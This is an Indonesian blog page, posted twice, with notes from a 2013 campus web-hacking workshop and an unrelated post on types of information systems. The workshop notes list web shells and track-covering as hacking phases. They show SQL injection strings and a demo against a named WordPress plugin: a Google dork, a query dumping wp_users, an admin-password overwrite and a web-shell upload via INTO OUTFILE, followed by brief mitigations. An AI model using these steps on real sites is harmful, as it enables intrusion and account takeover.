Monday, 4 March 2013

Web Hacking X-Code





Oleh    : Zaenab A. Zahra
Teka-Teki Report Password
Web Hacking X-Code 2 Maret 2013
UIN Maulana Malik Ibrahim Malang




Pemahaman dasar ethical hacker
Keamanan komputer menjadi penting?
-        Perkembangan komputer
-        Ketergantungan manusia
-        Tuntutan kompleksitas semakin tinggi
-        Keamanan menjadi anak tiri
-        Kemampuan orang disebut hacker menjadi menurun
-        Kemampuan rendah bisa menjadi ancaman tinggi untuk kepentingan umum

Terminologi hacker
-        Vulnerability    : mengetahui celah keamanan
-        Threat               : bagaimana cara-cara yang harus dilakukan supaya bisa masuk
-        Attack              : prosees masuk/ membobol keamanannya
-        Exploit             : memanage apa yang harus dilakukan di dalamnya

 Contoh Situs yang menyediakan exploits
-  Metasploit Framework 
 
-   Exploit-db.com 
 
securityfocus.com
Darkc0de.com
packetstormsecurity.org   

 
Element-element keamanan (CIA)
1.    Confidentiality
            Keamanan informasi data untuk diketahui atau dibaca oleh pihak yang tidak dikehendaki
2.    Integrity / integritas
            Keamanan informasi data untuk menghindari adanya perubahan yang tidak dikehendaki
-        3.  Availability
            Keamanan informasi data untuk ketersediaan atau keberadaannya


Sebuah program harusnya berada di tengah-tengahnya.



 
Pengelompokkan hacke
  1. Black Hat Hacker
  2. White Hat Hacker
  3. Grey Hat Hacker
  4. Suicide Hacker

Tahapan aktifitas Hacking
-        Reconnaissance
1.     Reconnaissance Passive
- Pencarian data target di google
- Pencarian data target di berbagai jejaring sosial
2.     Reconnaissance Active
- HTTP Fingerprint

-        Scanning, pencarian berdasarkan scanning
- Google.com
- Archive Milw0rm
- Archive Exploit DB
- Metasploit Framework
- Darkc0de

-        Gaining Acces
- Exploitasi Remote Execution pada celah keamanan OS
- Exploitasi Remote Execution pada celah keamanan aplikasi
- Exploitasi Remote Execution pada celah keamanan web

-        Maintaining acces
PHP Backdoor
Simple php shell
R57
C99 / C100
ASP Backdoor
B374K

-        Covering Tracks
- Pembersihan berbagai exploit atau software yang diupload
- Pembersihan jejak disesuaikan dengan penggunaan aplikasi di target dan ke target.


KONSEP
SQL Injection
GET dan POST
-        GET : www.site.com/form.php?nama=zae
-        POST : www.site.com/form.php
IMPLEMENTASI pada method GET & POST
-        Langsung dari URL
-        Header : Content-Type: application/x-www-form-urlencoded
-        Data : variable=value

Query
-        $query = “SELECT * FROM contoh WHERE nama =’$username’”;
-        $username = dari GET atau POST
SQL Injection
-        $query = “SELECT namaTabel FROM contoh WHERE nama =’$username’”; DROP TABLE namaTabel; --’
-        $query = “SELECT namaTabel FROM contoh WHERE nama =‘terserah‘ OR ‘x’ = ‘x’”;
Noobs…


 
DEMO WEB HACKING
Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability

Vulnerability Info
-        Description : Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability
-        Version : 2.7.1 - 3.0.1
-        Date : 26-05-2012
-        Google Dork : inurl:/wp-content/plugins/store-locator-le/
-        Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
SQL Injection Vuln



POST Method, Advanced REST Client
-        Method : POST
-        Header : Content-Type: application/x-www-form-urlencoded
-        Data : query=[injection]
-        Contoh:
query=SELECT * FROM wp_users
Mengatasi Teka-Teki Hash
UPDATE – replace password
            UPDATE  wp_users SET  user_pass =  '$P$BAu2rgOUahu8hibdJ12ToW4zu6b.XB.' WHERE  `wp_users`.`ID` =1 LIMIT 1 ;
-        Mengganti password menjadi “Password”
Upload b374k via Query
SELECT ’[kode script]’ INTO OUTFILE “e:/AppServ/www/ict2013/exploit.php”
http://localhost/ict2013/wp-content/plugins/store-locator-le/core/load_wp_config.php
+ diganti %2B
Base 64 Encryption
Base64 adalah istilah umum untuk sejumlah skema pengkodean serupa yang mengkodekan data biner dan menerjemahkannya ke dalam representasi basis 64. Istilah Base64 berasal dari konten pengkodean MIME tertentu. (Wikipedia, 2010)



PENGAMANAN
-        Update CMS, plugin
-        Menggunakan mysql_real_escape_string()
-        Memberikan validasi pada tiap inputan
-        Berikan length limit pada inputan
-        Config database error report
-        Setting php.ini
-        dll 








PIRAMIDA INFORMASI

Gambar. Piramida Informasi


Dalam sistem informasi terdapat beberapa jenis yang membedakan antara sistem informasi yang satu dengan yang lain nya. Berikut uraian jenis jenis sistem informasi.

1. Transaction Processing System (TPS)
- sistem informasi yang terkomputerisasi yang dikembangkan untuk memproses data-data dalam jumlah besar untuk transaksi bisnis rutin seperti daftar gaji dan inventarisasi.
- TPS menghapus rasa bosan saat melakukan transaksi operasional sekaligus mengurangi waktu, meskipun orang masih harus memasukkan data ke sistem komputer secara manual.
- merupakan sistem tanpa batas yang memungkinkan organisasi berinteraksi dengan lilngkungan eksternal. Karena manajer melihat data-data yang dihasilkan oleh TPS untuk memperbaharui informasi setiap menit mengenai apa yang terjadi di perusahaan mereka.

2. Office Automation System (OAS) dan Knowledge Work System (KWS)
-Office Automation System (OAS) mendukung pekerja data
-OAS yang sudah kita kenal seperti word proessing, spreadsheets, destop,publishing, electronic scheduling dan komunikasi melalui voice mail, email, dan video confrencing.
- Knowledge Work System (KWS) mendukung para pekerja profesional seperti ilmuwan, insinyur, dan doktor dengan membantu mereka menciptakan pengetahuan baru dan memungkinkan mereka mengkontribusikannya ke organisasi atau masyarakat.

3. Sistem Informasi Manajemen (SIM)
- Sistem Informasi Manajemen (SIM) tidak menggantikan Transaction Processing Systems
- SIM mencakup pengolahan transaksi
- SIM adalah sistem informasi yang sudah terkomputerisasi yang bekerja karena adanya interaksi antara manusia dan komputer
- SIM mendukung spektrum tugas-tugas organisasional yang lebih luas dari Transaction Processing Systems, termasuk analisis keputusan dan pembuatan keputusan.
- SIM menghasilkan output informasi yang digunakan untuk membuat keputusan. SIM juga dapat membantu menyatukan beberapa fungsi informasi bisnis yang sudah terkomputerisasi, meski tidak berupa suatu struktur tunggal.

4. Decision Support System (DSS)
- Decision Support System (DSS) adalah Kelas sistem informasi terkomputerisasi pada level yang lebih tinggi
- DSS hampir sama dengan SIM tradisional kerena keduanya sama-sama tergantung pada basis data sebagai sumber data
- DSS berangkat dari SIM tradisional kerena menekankan pada fungsi mendukung pembuatan keputusan di seluruh tahap-tahapnya

5. Artificial Intellegence (AI)
Sebuah program komputer yang dirancang untuk memodelkan kemampuan menyelesaikan masalah seperti layaknya seorang pakar (human expert).

6. Executive Support System (ESS)
- Executive Support System (ESS) membantu para eksekutif mengatur interaksi mereka dengan lingkungan eksternal dengan menyediakan grafik-grafik dan pendukung komunikasi di tempat-tempat yang bisa di akses seperti kantor
- ESS tergantung pada informasi yang dihasilkan oleh TPS dan SIM
- ESS membantu pengguna mengatasi problem keputusan yang tidak terstruktur, yang bukan aplikasi khusus, dengan menciptakan lingkungan yang kondusif untuk memikirkan problem-problem strategis.

Monday, 4 March 2013

Web Hacking X-Code

Posted by Unknown at 20:49 0 comments




Oleh    : Zaenab A. Zahra
Teka-Teki Report Password
Web Hacking X-Code 2 Maret 2013
UIN Maulana Malik Ibrahim Malang




Pemahaman dasar ethical hacker
Keamanan komputer menjadi penting?
-        Perkembangan komputer
-        Ketergantungan manusia
-        Tuntutan kompleksitas semakin tinggi
-        Keamanan menjadi anak tiri
-        Kemampuan orang disebut hacker menjadi menurun
-        Kemampuan rendah bisa menjadi ancaman tinggi untuk kepentingan umum

Terminologi hacker
-        Vulnerability    : mengetahui celah keamanan
-        Threat               : bagaimana cara-cara yang harus dilakukan supaya bisa masuk
-        Attack              : prosees masuk/ membobol keamanannya
-        Exploit             : memanage apa yang harus dilakukan di dalamnya

 Contoh Situs yang menyediakan exploits
-  Metasploit Framework 
 
-   Exploit-db.com 
 
securityfocus.com
Darkc0de.com
packetstormsecurity.org   

 
Element-element keamanan (CIA)
1.    Confidentiality
            Keamanan informasi data untuk diketahui atau dibaca oleh pihak yang tidak dikehendaki
2.    Integrity / integritas
            Keamanan informasi data untuk menghindari adanya perubahan yang tidak dikehendaki
-        3.  Availability
            Keamanan informasi data untuk ketersediaan atau keberadaannya


Sebuah program harusnya berada di tengah-tengahnya.



 
Pengelompokkan hacke
  1. Black Hat Hacker
  2. White Hat Hacker
  3. Grey Hat Hacker
  4. Suicide Hacker

Tahapan aktifitas Hacking
-        Reconnaissance
1.     Reconnaissance Passive
- Pencarian data target di google
- Pencarian data target di berbagai jejaring sosial
2.     Reconnaissance Active
- HTTP Fingerprint

-        Scanning, pencarian berdasarkan scanning
- Google.com
- Archive Milw0rm
- Archive Exploit DB
- Metasploit Framework
- Darkc0de

-        Gaining Acces
- Exploitasi Remote Execution pada celah keamanan OS
- Exploitasi Remote Execution pada celah keamanan aplikasi
- Exploitasi Remote Execution pada celah keamanan web

-        Maintaining acces
PHP Backdoor
Simple php shell
R57
C99 / C100
ASP Backdoor
B374K

-        Covering Tracks
- Pembersihan berbagai exploit atau software yang diupload
- Pembersihan jejak disesuaikan dengan penggunaan aplikasi di target dan ke target.


KONSEP
SQL Injection
GET dan POST
-        GET : www.site.com/form.php?nama=zae
-        POST : www.site.com/form.php
IMPLEMENTASI pada method GET & POST
-        Langsung dari URL
-        Header : Content-Type: application/x-www-form-urlencoded
-        Data : variable=value

Query
-        $query = “SELECT * FROM contoh WHERE nama =’$username’”;
-        $username = dari GET atau POST
SQL Injection
-        $query = “SELECT namaTabel FROM contoh WHERE nama =’$username’”; DROP TABLE namaTabel; --’
-        $query = “SELECT namaTabel FROM contoh WHERE nama =‘terserah‘ OR ‘x’ = ‘x’”;
Noobs…


 
DEMO WEB HACKING
Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability

Vulnerability Info
-        Description : Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability
-        Version : 2.7.1 - 3.0.1
-        Date : 26-05-2012
-        Google Dork : inurl:/wp-content/plugins/store-locator-le/
-        Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
SQL Injection Vuln



POST Method, Advanced REST Client
-        Method : POST
-        Header : Content-Type: application/x-www-form-urlencoded
-        Data : query=[injection]
-        Contoh:
query=SELECT * FROM wp_users
Mengatasi Teka-Teki Hash
UPDATE – replace password
            UPDATE  wp_users SET  user_pass =  '$P$BAu2rgOUahu8hibdJ12ToW4zu6b.XB.' WHERE  `wp_users`.`ID` =1 LIMIT 1 ;
-        Mengganti password menjadi “Password”
Upload b374k via Query
SELECT ’[kode script]’ INTO OUTFILE “e:/AppServ/www/ict2013/exploit.php”
http://localhost/ict2013/wp-content/plugins/store-locator-le/core/load_wp_config.php
+ diganti %2B
Base 64 Encryption
Base64 adalah istilah umum untuk sejumlah skema pengkodean serupa yang mengkodekan data biner dan menerjemahkannya ke dalam representasi basis 64. Istilah Base64 berasal dari konten pengkodean MIME tertentu. (Wikipedia, 2010)



PENGAMANAN
-        Update CMS, plugin
-        Menggunakan mysql_real_escape_string()
-        Memberikan validasi pada tiap inputan
-        Berikan length limit pada inputan
-        Config database error report
-        Setting php.ini
-        dll 








PIRAMIDA INFORMASI

Posted by Unknown at 20:26 0 comments
Gambar. Piramida Informasi


Dalam sistem informasi terdapat beberapa jenis yang membedakan antara sistem informasi yang satu dengan yang lain nya. Berikut uraian jenis jenis sistem informasi.

1. Transaction Processing System (TPS)
- sistem informasi yang terkomputerisasi yang dikembangkan untuk memproses data-data dalam jumlah besar untuk transaksi bisnis rutin seperti daftar gaji dan inventarisasi.
- TPS menghapus rasa bosan saat melakukan transaksi operasional sekaligus mengurangi waktu, meskipun orang masih harus memasukkan data ke sistem komputer secara manual.
- merupakan sistem tanpa batas yang memungkinkan organisasi berinteraksi dengan lilngkungan eksternal. Karena manajer melihat data-data yang dihasilkan oleh TPS untuk memperbaharui informasi setiap menit mengenai apa yang terjadi di perusahaan mereka.

2. Office Automation System (OAS) dan Knowledge Work System (KWS)
-Office Automation System (OAS) mendukung pekerja data
-OAS yang sudah kita kenal seperti word proessing, spreadsheets, destop,publishing, electronic scheduling dan komunikasi melalui voice mail, email, dan video confrencing.
- Knowledge Work System (KWS) mendukung para pekerja profesional seperti ilmuwan, insinyur, dan doktor dengan membantu mereka menciptakan pengetahuan baru dan memungkinkan mereka mengkontribusikannya ke organisasi atau masyarakat.

3. Sistem Informasi Manajemen (SIM)
- Sistem Informasi Manajemen (SIM) tidak menggantikan Transaction Processing Systems
- SIM mencakup pengolahan transaksi
- SIM adalah sistem informasi yang sudah terkomputerisasi yang bekerja karena adanya interaksi antara manusia dan komputer
- SIM mendukung spektrum tugas-tugas organisasional yang lebih luas dari Transaction Processing Systems, termasuk analisis keputusan dan pembuatan keputusan.
- SIM menghasilkan output informasi yang digunakan untuk membuat keputusan. SIM juga dapat membantu menyatukan beberapa fungsi informasi bisnis yang sudah terkomputerisasi, meski tidak berupa suatu struktur tunggal.

4. Decision Support System (DSS)
- Decision Support System (DSS) adalah Kelas sistem informasi terkomputerisasi pada level yang lebih tinggi
- DSS hampir sama dengan SIM tradisional kerena keduanya sama-sama tergantung pada basis data sebagai sumber data
- DSS berangkat dari SIM tradisional kerena menekankan pada fungsi mendukung pembuatan keputusan di seluruh tahap-tahapnya

5. Artificial Intellegence (AI)
Sebuah program komputer yang dirancang untuk memodelkan kemampuan menyelesaikan masalah seperti layaknya seorang pakar (human expert).

6. Executive Support System (ESS)
- Executive Support System (ESS) membantu para eksekutif mengatur interaksi mereka dengan lingkungan eksternal dengan menyediakan grafik-grafik dan pendukung komunikasi di tempat-tempat yang bisa di akses seperti kantor
- ESS tergantung pada informasi yang dihasilkan oleh TPS dan SIM
- ESS membantu pengguna mengatasi problem keputusan yang tidak terstruktur, yang bukan aplikasi khusus, dengan menciptakan lingkungan yang kondusif untuk memikirkan problem-problem strategis.
 

Catatanku Template by Ipietoon Cute Blog Design